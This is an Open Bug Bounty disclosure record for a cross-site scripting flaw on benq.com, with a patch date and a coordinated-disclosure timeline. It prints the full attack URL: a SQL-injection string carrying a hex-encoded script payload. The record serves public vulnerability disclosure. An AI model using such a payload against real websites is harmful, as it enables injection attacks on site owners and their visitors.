benq.com XSS vulnerability

2015-07-16T22:36:00
ID OBB:73310
Type openbugbounty
Reporter nopernik
Modified 2016-01-30T21:21:00

Description

Vulnerable URL:
http://www.benq.com/search/module/?q=123' OR (SELECT 6054 FROM(SELECT COUNT(*),CONCAT(0xa3c7363726970743e616c657274282f787373706f7365642f293c2f7363726970743e,(SELECT (ELT(true,123))),';',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a);-- -
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 21:21 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 55757
Google Pagerank| 6
VIP website status:| No
Check benq.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 16 July, 2015 22:36 GMT
Vulnerability existence verified and confirmed| 16 July, 2015 22:38 GMT
Vulnerability patched by the website owner| 30 January, 2016 21:21 GMT